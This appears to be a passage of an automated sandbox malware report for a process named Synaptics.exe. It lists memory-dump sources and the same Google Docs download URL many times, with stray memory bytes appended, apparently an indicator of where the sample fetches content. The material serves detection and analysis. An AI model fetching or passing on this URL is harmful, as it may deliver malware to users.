                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.comE
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn02
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn07
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelV
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelYj
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnd:#f
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnek
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadness(
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnga
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniver
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyorvj
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnk
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnnect
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnsH
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoG
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoW
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocati
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadodel
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadomputz$
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo_
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop:0;max-width:none;paddin
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...%
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...-
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador1
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadort=d
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoru
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpadding-right:0
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpt
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqF
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqH
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqHlg
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqL
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqY
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadquK
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr%
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr-srcvWa
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr4
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrA
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrM
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrch
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrch-c
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrflo
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigin
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrity
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsion
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadscrip
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadss
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsx
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsy
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt17
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtN
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtZ
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtc
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtcN/)
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd?
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtdXfL
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadte
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:3
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlenis
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadttp/cf
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt~
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu)
